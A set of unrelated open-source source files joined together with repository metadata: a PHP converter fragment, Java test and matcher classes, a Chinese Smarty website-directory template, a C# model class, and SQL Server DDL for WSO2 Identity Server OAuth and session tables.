return new Struct\Fare\PriceUpsellWithoutPNR($requestOptions);
}
}
| amabnl/amadeus-ws-client | src/Amadeus/Client/RequestCreator/Converter/Fare/PriceUpsellWithoutPNRConv.php | PHP | apache-2.0 | 1,463 |
package com.concavenp.nanodegree.shared;
import org.junit.Test;
import static org.junit.Assert.*;
/**
* To work on unit tests, switch the Test Artifact in the Build Variants view.
*/
public class ExampleUnitTest {
@Test
public void addition_isCorrect() throws Exception {
assertEquals(4, 2 + 2);
}
} | concaveNP/GoUbiquitous | shared/src/test/java/com/concavenp/nanodegree/shared/ExampleUnitTest.java | Java | apache-2.0 | 324 |
<!DOCTYPE HTML>
<html>
<head>
<title>{#$site_title#}</title>
<meta charset="utf-8">
<meta name="Keywords" content="{#$site_keywords#}" />
<meta name="Description" content="{#$site_description#}" />
<link href="{#$site_root#}themes/default/skin/nav.css" rel="stylesheet" type="text/css" />
<script type="text/javascript">var sitepath = '{#$site_root#}'; var rewrite = '{#$cfg.link_struct#}';</script>
<script type="text/javascript" src="{#$site_root#}public/scripts/jquery.min.js"></script>
<script type="text/javascript" src="{#$site_root#}public/scripts/common.js"></script>
</head>
<body>
{#include file="topbar.html"#}
<div id="wrapper">
<div id="header">
<div id="topbox">
<a href="{#$site_url#}" class="logo" title="{#$site_title#}"></a>
<div id="sobox">
<form name="sofrm" class="sofrm" method="get" action="" onSubmit="return rewrite_search()">
<input name="mod" type="hidden" id="mod" value="search" />
<input name="type" type="hidden" id="type" value="name" />
<div id="selopt">
<div id="cursel">网站名称</div>
<ul id="options">
<li><a href="javascript: void(0);" name="name">网站名称</a></li>
<li><a href="javascript: void(0);" name="url">网站地址</a></li>
<li><a href="javascript: void(0);" name="tags">TAG标签</a></li>
<li><a href="javascript: void(0);" name="intro">网站描述</a></li>
</ul>
</div>
<input name="query" type="text" class="sipt" id="query" onFocus="this.value='';" /><input type="submit" class="sbtn" value="搜 索" />
</form>
</div>
</div>
<div id="navbox">
<ul class="navbar">
<li><a href="?mod=index">网站首页</a></li><li class="navline"></li>
<li><a href="?mod=webdir">网站目录</a></li><li class="navline"></li>
<li><a href="?mod=article">站长资讯</a></li><li class="navline"></li>
<li><a href="?mod=weblink">链接交换</a></li><li class="navline"></li>
<li><a href="?mod=category">分类浏览</a></li><li class="navline"></li>
<li><a href="?mod=update">最新收录</a></li><li class="navline"></li>
<li><a href="?mod=archives">数据归档</a></li><li class="navline"></li>
<li><a href="?mod=top">TOP排行榜</a></li><li class="navline"></li>
<li><a href="?mod=feedback">意见反馈</a></li><li class="navline"></li>
</ul>
</div>
<div id="txtbox">
<div class="count">数据统计:<b>{#$stat.category#}</b>个主题分类,<b>{#$stat.website#}</b>个优秀站点,<b>{#$stat.article#}</b>篇站长资讯</div>
<div class="link">快捷方式:<a href="{#$site_root#}member/?mod=website&act=add">网站提交</a> - <a href="{#$site_root#}member/?mod=article&act=add">软文投稿</a> - <a href="{#$site_root#}?mod=diypage&pid=1">帮助中心</a></div>
</div>
</div>
<div class="blank10"></div>
<div id="quickbox"><strong>快速审核:</strong>{#foreach from=get_websites(0, 12, true) item=quick#}<a href="{#$quick.web_link#}" title="{#$quick.web_name#}">{#$quick.web_name#}</a>{#/foreach#}</div>
<div class="blank10"></div>
<div id="homebox">
<div id="homebox-left">
<dl id="hcatebox" class="clearfix">
{#foreach from=get_categories() item=cate#}
{#if $cate.cate_mod == 'webdir'#}
<dt><a href="{#$cate.cate_link#}">{#$cate.cate_name#}</a></dt>
<dd>
<ul class="hcatelist">
{#foreach from=get_categories($cate.cate_id) item=scate#}
<li><a href="{#$scate.cate_link#}">{#$scate.cate_name#}</a></li>
{#/foreach#}
</ul>
</dd>
{#/if#}
{#/foreach#}
</dl>
<div class="blank10"></div>
<div id="newbox">
<h3>最新收录</h3>
<ul class="newlist">
{#foreach from=get_websites(0, 14) item=new#}
<li><span>{#$new.web_ctime#}</span><a href="{#$new.web_link#}" title="{#$new.web_name#}">{#$new.web_name#}</a></li>
{#/foreach#}
</ul>
</div>
</div>
<div id="homebox-right">
<div id="bestbox">
<h3><span>站长推荐</span></h3>
<ul class="clearfix bestlist">
{#foreach from=get_websites(0, 35, false, true) item=best#}
<li><a href="{#$best.web_link#}" title="{#$best.web_name#}">{#$best.web_name#}</a></li>
{#/foreach#}
</ul>
</div>
<div class="blank10"></div>
<div id="coolbox" class="clearfix">
<h3>酷站导航</h3>
<ul class="csitelist">
{#foreach from=get_best_categories() item=cate name=csite#}
<li><h4><a href="{#$cate.cate_link#}">{#$cate.cate_name#}</a></h4><a href="{#$cate.cate_link#}" class="more">更多>></a>{#foreach from=get_websites($cate.cate_id, 5) item=cool#}<span><a href="{#$cool.web_link#}" title="{#$cool.web_name#}">{#$cool.web_name#}</a></span>{#/foreach#}</li>
{#if $smarty.foreach.csite.iteration % 5 == 0 && $smarty.foreach.csite.iteration != 20#}
<li class="sline"></li>
{#/if#}
{#/foreach#}
</ul>
</div>
<div class="blank10"></div>
<div id="rowbox" class="clearfix">
<div id="newsbox">
<h3>站点资讯</h3>
<ul class="newslist">
{#foreach from=get_articles(0, 8, false) item=art#}
<li><span>{#$art.art_ctime#}</span><a href="{#$art.art_link#}">{#$art.art_title#}</a></li>
{#/foreach#}
</ul>
</div>
<div class="line"></div>
<div id="exlink">
<h3>链接交换</h3>
<ul class="exlist">
{#foreach from=get_weblinks(0, 8) item=link#}
<li><a href="{#$link.web_link#}">{#$link.link_name#} - PR{#$link.web_grank#},百度权重{#$link.web_brank#},{#$link.deal_type#}友情链接</a></li>
{#/foreach#}
</ul>
</div>
</div>
</div>
</div>
<div class="blank10"></div>
<div id="inbox" class="clearfix">
<h3>最新点入</h3>
<ul class="inlist">
{#nocache#}
{#foreach from=get_websites(0, 30, false, false, 'instat') item=instat#}
<li><a href="{#$instat.web_link#}" title="{#$instat.web_name#}">{#$instat.web_name#}</a></li>
{#/foreach#}
{#/nocache#}
</ul>
</div>
<div class="blank10"></div>
<div id="linkbox" class="clearfix">
<h3>友情链接</h3>
<ul class="linklist">
{#foreach from=get_links() item=link#}
<li><a href="{#$link.link_url#}" target="_blank">{#$link.link_name#}</a></li>
{#/foreach#}
</ul>
</div>
{#include file="footer.html"#}
</div>
</body>
</html> | zhanxizhu/lxsndir | themes/模板/base/index.html | HTML | apache-2.0 | 7,388 |
/*
* Copyright (c) 2013-2015 Josef Hardi <[email protected]>
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.obidea.semantika.datatype;
import com.obidea.semantika.datatype.exception.InvalidLexicalFormException;
import com.obidea.semantika.datatype.primitive.XsdDecimal;
public abstract class AbstractDerivedDecimalType extends AbstractXmlType<Number>
{
protected AbstractDerivedDecimalType(String name)
{
super(name);
}
@Override
public IDatatype<?> getPrimitiveDatatype()
{
return XsdDecimal.getInstance();
}
@Override
public Number getValue(String lexicalForm)
{
return parseLexicalForm(lexicalForm);
}
@Override
public boolean isPrimitive()
{
return false;
}
/**
* Parse and validate a lexical form of the literal.
*
* @param lexicalForm
* the typing form of the literal.
* @return A <code>Number</code> representation of the literal
* @throws InvalidLexicalFormException
* if the literal form is invalid or the value is out of range
*/
protected abstract Number parseLexicalForm(String lexicalForm) throws InvalidLexicalFormException;
}
| obidea/semantika | src/main/java/com/obidea/semantika/datatype/AbstractDerivedDecimalType.java | Java | apache-2.0 | 1,709 |
using System;
namespace EtoTest.Model
{
public class DataFileVersion
{
/// <summary>
/// The name of this station - writen to name of conlict files when resyncing.
/// </summary>
public String StationName { get; set; }
/// <summary>
/// If this ID is different from the current on google drive then updates have occured on google
/// </summary>
public int FromVersionId { get; set; }
/// <summary>
/// If we have made some of our own updates when offline, then this value is incremented from 0.
/// </summary>
public int? CurrentVersionId { get; set; }
/// <summary>
/// A description of the operation that we are about to attempt. If this value is set; then we crashed before the last operation completed.
/// Set to null immediately after completing an operation.
/// </summary>
public String BeforeOperation { get; set; }
}
} | michaeljfarr/FilePharoah | m.Indexer/EtoTest/Model/DataFileVersion.cs | C# | apache-2.0 | 984 |
/*
Copyright (C) 2013-2020 Expedia Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
package com.hotels.styx.support.matchers;
import org.hamcrest.Description;
import org.hamcrest.Matcher;
import org.hamcrest.TypeSafeMatcher;
import java.util.Objects;
import java.util.Optional;
/**
* Provides matchers around the {@code Optional} class.
*
* @param <T>
* @author john.butler
* @see Optional
*/
public final class IsOptional<T> extends TypeSafeMatcher<Optional<? extends T>> {
/**
* Checks that the passed Optional is not present.
*/
public static IsOptional<Object> isAbsent() {
return new IsOptional<>(false);
}
/**
* Checks that the passed Optional is present.
*/
public static IsOptional<Object> isPresent() {
return new IsOptional<>(true);
}
public static <T> IsOptional<T> isValue(T value) {
return new IsOptional<>(value);
}
public static <T> IsOptional<T> matches(Matcher<T> matcher) {
return new IsOptional<>(matcher);
}
public static <T extends Iterable> IsOptional<T> isIterable(Matcher<? extends Iterable> matcher) {
return new IsOptional<>((Matcher) matcher);
}
private final boolean someExpected;
private final Optional<T> expected;
private final Optional<Matcher<T>> matcher;
private IsOptional(boolean someExpected) {
this.someExpected = someExpected;
this.expected = Optional.empty();
this.matcher = Optional.empty();
}
private IsOptional(T value) {
this.someExpected = true;
this.expected = Optional.of(value);
this.matcher = Optional.empty();
}
private IsOptional(Matcher<T> matcher) {
this.someExpected = true;
this.expected = Optional.empty();
this.matcher = Optional.of(matcher);
}
@Override
public void describeTo(Description description) {
if (!someExpected) {
description.appendText("<Absent>");
} else if (expected.isPresent()) {
description.appendValue(expected);
} else if (matcher.isPresent()) {
description.appendText("a present value matching ");
matcher.get().describeTo(description);
} else {
description.appendText("<Present>");
}
}
@Override
public boolean matchesSafely(Optional<? extends T> item) {
if (!someExpected) {
return !item.isPresent();
} else if (expected.isPresent()) {
return item.isPresent() && Objects.equals(item.get(), expected.get());
} else if (matcher.isPresent()) {
return item.isPresent() && matcher.get().matches(item.get());
} else {
return item.isPresent();
}
}
}
| mikkokar/styx | support/testsupport/src/main/java/com/hotels/styx/support/matchers/IsOptional.java | Java | apache-2.0 | 3,272 |
-- Start of IDN Tables --
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_BASE_TABLE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_BASE_TABLE (
PRODUCT_NAME VARCHAR(20),
PRIMARY KEY (PRODUCT_NAME)
);
INSERT INTO IDN_BASE_TABLE values ('WSO2 Identity Server');
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH_CONSUMER_APPS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH_CONSUMER_APPS (
ID INTEGER IDENTITY,
CONSUMER_KEY VARCHAR(255),
CONSUMER_SECRET VARCHAR(2048),
USERNAME VARCHAR(255),
TENANT_ID INTEGER DEFAULT 0,
USER_DOMAIN VARCHAR(50),
APP_NAME VARCHAR(255),
OAUTH_VERSION VARCHAR(128),
CALLBACK_URL VARCHAR(2048),
GRANT_TYPES VARCHAR(1024),
PKCE_MANDATORY CHAR(1) DEFAULT '0',
PKCE_SUPPORT_PLAIN CHAR(1) DEFAULT '0',
APP_STATE VARCHAR (25) DEFAULT 'ACTIVE',
USER_ACCESS_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
APP_ACCESS_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
REFRESH_TOKEN_EXPIRE_TIME BIGINT DEFAULT 84600,
ID_TOKEN_EXPIRE_TIME BIGINT DEFAULT 3600,
CONSTRAINT CONSUMER_KEY_CONSTRAINT UNIQUE (CONSUMER_KEY),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE_VALIDATORS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE_VALIDATORS (
APP_ID INTEGER NOT NULL,
SCOPE_VALIDATOR VARCHAR (128) NOT NULL,
PRIMARY KEY (APP_ID,SCOPE_VALIDATOR),
FOREIGN KEY (APP_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH1A_REQUEST_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH1A_REQUEST_TOKEN (
REQUEST_TOKEN VARCHAR(512),
REQUEST_TOKEN_SECRET VARCHAR(512),
CONSUMER_KEY_ID INTEGER,
CALLBACK_URL VARCHAR(2048),
SCOPE VARCHAR(2048),
AUTHORIZED VARCHAR(128),
OAUTH_VERIFIER VARCHAR(512),
AUTHZ_USER VARCHAR(512),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (REQUEST_TOKEN),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH1A_ACCESS_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH1A_ACCESS_TOKEN (
ACCESS_TOKEN VARCHAR(512),
ACCESS_TOKEN_SECRET VARCHAR(512),
CONSUMER_KEY_ID INTEGER,
SCOPE VARCHAR(2048),
AUTHZ_USER VARCHAR(512),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (ACCESS_TOKEN),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN (
TOKEN_ID VARCHAR (255),
ACCESS_TOKEN VARCHAR(2048),
REFRESH_TOKEN VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
USER_TYPE VARCHAR (25),
GRANT_TYPE VARCHAR (50),
TIME_CREATED DATETIME,
REFRESH_TOKEN_TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
REFRESH_TOKEN_VALIDITY_PERIOD BIGINT,
TOKEN_SCOPE_HASH VARCHAR(32),
TOKEN_STATE VARCHAR(25) DEFAULT 'ACTIVE',
TOKEN_STATE_ID VARCHAR (128) DEFAULT 'NONE',
SUBJECT_IDENTIFIER VARCHAR(255),
ACCESS_TOKEN_HASH VARCHAR(512),
REFRESH_TOKEN_HASH VARCHAR(512),
IDP_ID INTEGER DEFAULT -1 NOT NULL,
TOKEN_BINDING_REF VARCHAR (32) DEFAULT 'NONE',
PRIMARY KEY (TOKEN_ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE,
CONSTRAINT CON_APP_KEY UNIQUE (CONSUMER_KEY_ID,AUTHZ_USER,TENANT_ID,USER_DOMAIN,USER_TYPE,TOKEN_SCOPE_HASH,
TOKEN_STATE,TOKEN_STATE_ID,IDP_ID,TOKEN_BINDING_REF)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_TOKEN_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_TOKEN_BINDING (
TOKEN_ID VARCHAR (255),
TOKEN_BINDING_TYPE VARCHAR (32),
TOKEN_BINDING_REF VARCHAR (32),
TOKEN_BINDING_VALUE VARCHAR (1024),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (TOKEN_ID),
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN_AUDIT]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN_AUDIT (
TOKEN_ID VARCHAR (255),
ACCESS_TOKEN VARCHAR(2048),
REFRESH_TOKEN VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
USER_TYPE VARCHAR (25),
GRANT_TYPE VARCHAR (50),
TIME_CREATED DATETIME,
REFRESH_TOKEN_TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
REFRESH_TOKEN_VALIDITY_PERIOD BIGINT,
TOKEN_SCOPE_HASH VARCHAR(32),
TOKEN_STATE VARCHAR(25),
TOKEN_STATE_ID VARCHAR (128) ,
SUBJECT_IDENTIFIER VARCHAR(255),
ACCESS_TOKEN_HASH VARCHAR(512),
REFRESH_TOKEN_HASH VARCHAR(512),
INVALIDATED_TIME DATETIME,
IDP_ID INTEGER DEFAULT -1 NOT NULL
);
IF EXISTS (SELECT NAME FROM SYSINDEXES WHERE NAME = 'IDX_AT_CK_AU')
DROP INDEX IDN_OAUTH2_ACCESS_TOKEN.IDX_AT_CK_AU
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_AUTHORIZATION_CODE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_AUTHORIZATION_CODE (
CODE_ID VARCHAR (255),
AUTHORIZATION_CODE VARCHAR(2048),
CONSUMER_KEY_ID INTEGER,
CALLBACK_URL VARCHAR(2048),
SCOPE VARCHAR(2048),
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
TIME_CREATED DATETIME,
VALIDITY_PERIOD BIGINT,
STATE VARCHAR (25) DEFAULT 'ACTIVE',
TOKEN_ID VARCHAR(255),
SUBJECT_IDENTIFIER VARCHAR(255),
PKCE_CODE_CHALLENGE VARCHAR (255),
PKCE_CODE_CHALLENGE_METHOD VARCHAR(128),
AUTHORIZATION_CODE_HASH VARCHAR(512),
IDP_ID INTEGER DEFAULT -1 NOT NULL,
PRIMARY KEY (CODE_ID),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_AUTHZ_CODE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_AUTHZ_CODE_SCOPE (
CODE_ID VARCHAR (255),
SCOPE VARCHAR (60),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (CODE_ID, SCOPE),
FOREIGN KEY (CODE_ID) REFERENCES IDN_OAUTH2_AUTHORIZATION_CODE(CODE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_DEVICE_FLOW]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_DEVICE_FLOW (
CODE_ID VARCHAR(255),
DEVICE_CODE VARCHAR(255),
USER_CODE VARCHAR(25),
CONSUMER_KEY_ID INTEGER,
LAST_POLL_TIME DATETIME NOT NULL,
EXPIRY_TIME DATETIME NOT NULL,
TIME_CREATED DATETIME NOT NULL,
POLL_TIME BIGINT,
STATUS VARCHAR (25) DEFAULT 'PENDING',
AUTHZ_USER VARCHAR (100),
TENANT_ID INTEGER,
USER_DOMAIN VARCHAR(50),
IDP_ID INTEGER,
PRIMARY KEY (DEVICE_CODE),
UNIQUE (CODE_ID),
UNIQUE (USER_CODE),
FOREIGN KEY (CONSUMER_KEY_ID) REFERENCES IDN_OAUTH_CONSUMER_APPS(ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_DEVICE_FLOW_SCOPES]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_DEVICE_FLOW_SCOPES (
ID INTEGER NOT NULL IDENTITY,
SCOPE_ID VARCHAR(255),
SCOPE VARCHAR(255),
PRIMARY KEY (ID),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_DEVICE_FLOW(CODE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_ACCESS_TOKEN_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_ACCESS_TOKEN_SCOPE (
TOKEN_ID VARCHAR (255),
TOKEN_SCOPE VARCHAR (60),
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (TOKEN_ID, TOKEN_SCOPE),
FOREIGN KEY (TOKEN_ID) REFERENCES IDN_OAUTH2_ACCESS_TOKEN(TOKEN_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE (
SCOPE_ID INTEGER IDENTITY,
NAME VARCHAR(255) NOT NULL,
DISPLAY_NAME VARCHAR(255) NOT NULL,
DESCRIPTION VARCHAR(512),
TENANT_ID INTEGER NOT NULL DEFAULT -1,
SCOPE_TYPE VARCHAR(255) NOT NULL,
PRIMARY KEY (SCOPE_ID),
UNIQUE (NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_SCOPE_BINDING]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_SCOPE_BINDING (
SCOPE_ID INTEGER NOT NULL,
SCOPE_BINDING VARCHAR(255) NOT NULL,
BINDING_TYPE VARCHAR(255) NOT NULL,
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE(SCOPE_ID) ON DELETE CASCADE,
UNIQUE (SCOPE_ID, SCOPE_BINDING, BINDING_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OAUTH2_RESOURCE_SCOPE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OAUTH2_RESOURCE_SCOPE (
RESOURCE_PATH VARCHAR(255) NOT NULL,
SCOPE_ID INTEGER NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (RESOURCE_PATH),
FOREIGN KEY (SCOPE_ID) REFERENCES IDN_OAUTH2_SCOPE (SCOPE_ID) ON DELETE CASCADE
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_SCIM_GROUP]') AND TYPE IN (N'U'))
CREATE TABLE IDN_SCIM_GROUP (
ID INTEGER IDENTITY,
TENANT_ID INTEGER NOT NULL,
ROLE_NAME VARCHAR(255) NOT NULL,
ATTR_NAME VARCHAR(1024) NOT NULL,
ATTR_VALUE VARCHAR(1024),
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_REMEMBER_ME]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_REMEMBER_ME (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT 0,
COOKIE_VALUE VARCHAR(1024),
CREATED_TIME DATETIME,
PRIMARY KEY (USER_NAME, TENANT_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_USER_RPS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_USER_RPS (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT 0,
RP_URL VARCHAR(255) NOT NULL,
TRUSTED_ALWAYS VARCHAR(128) DEFAULT 'FALSE',
LAST_VISIT DATE NOT NULL,
VISIT_COUNT INTEGER DEFAULT 0,
DEFAULT_PROFILE_NAME VARCHAR(255) DEFAULT 'DEFAULT',
PRIMARY KEY (USER_NAME, TENANT_ID, RP_URL)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_OPENID_ASSOCIATIONS]') AND TYPE IN (N'U'))
CREATE TABLE IDN_OPENID_ASSOCIATIONS (
HANDLE VARCHAR(255) NOT NULL,
ASSOC_TYPE VARCHAR(255) NOT NULL,
EXPIRE_IN DATETIME NOT NULL,
MAC_KEY VARCHAR(255) NOT NULL,
ASSOC_STORE VARCHAR(128) DEFAULT 'SHARED',
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (HANDLE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_STS_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_STS_STORE (
ID INTEGER IDENTITY,
TOKEN_ID VARCHAR(255) NOT NULL,
TOKEN_CONTENT VARBINARY(MAX) NOT NULL,
CREATE_DATE DATETIME NOT NULL,
EXPIRE_DATE DATETIME NOT NULL,
STATE INTEGER DEFAULT 0,
PRIMARY KEY (ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_IDENTITY_USER_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_IDENTITY_USER_DATA (
TENANT_ID INTEGER DEFAULT -1234,
USER_NAME VARCHAR(255) NOT NULL,
DATA_KEY VARCHAR(255) NOT NULL,
DATA_VALUE VARCHAR(2048),
PRIMARY KEY (TENANT_ID, USER_NAME, DATA_KEY)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_IDENTITY_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_IDENTITY_META_DATA (
USER_NAME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1234,
METADATA_TYPE VARCHAR(255) NOT NULL,
METADATA VARCHAR(255) NOT NULL,
VALID VARCHAR(255) NOT NULL,
PRIMARY KEY (TENANT_ID, USER_NAME, METADATA_TYPE,METADATA)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_THRIFT_SESSION]') AND TYPE IN (N'U'))
CREATE TABLE IDN_THRIFT_SESSION (
SESSION_ID VARCHAR(255) NOT NULL,
USER_NAME VARCHAR(255) NOT NULL,
CREATED_TIME VARCHAR(255) NOT NULL,
LAST_MODIFIED_TIME VARCHAR(255) NOT NULL,
TENANT_ID INTEGER DEFAULT -1,
PRIMARY KEY (SESSION_ID)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_STORE]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_STORE (
SESSION_ID VARCHAR (100) NOT NULL,
SESSION_TYPE VARCHAR(100) NOT NULL,
OPERATION VARCHAR(10) NOT NULL,
SESSION_OBJECT VARBINARY(MAX),
TIME_CREATED BIGINT,
TENANT_ID INTEGER DEFAULT -1,
EXPIRY_TIME BIGINT,
PRIMARY KEY (SESSION_ID, SESSION_TYPE, TIME_CREATED, OPERATION)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_APP_INFO]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_APP_INFO (
SESSION_ID VARCHAR (100) NOT NULL,
SUBJECT VARCHAR (100) NOT NULL,
APP_ID INTEGER NOT NULL,
INBOUND_AUTH_TYPE VARCHAR (255) NOT NULL,
PRIMARY KEY (SESSION_ID, SUBJECT, APP_ID, INBOUND_AUTH_TYPE)
);
IF NOT EXISTS (SELECT * FROM SYS.OBJECTS WHERE OBJECT_ID = OBJECT_ID(N'[DBO].[IDN_AUTH_SESSION_META_DATA]') AND TYPE IN (N'U'))
CREATE TABLE IDN_AUTH_SESSION_META_DATA (
SESSION_ID VARCHAR (100) NOT NULL,
PROPERTY_TYPE VARCHAR (100) NOT NULL,
VALUE VARCHAR (255) NOT NULL,
PRIMARY KEY (SESSION_ID, PROPERTY_TYPE, VALUE)
);
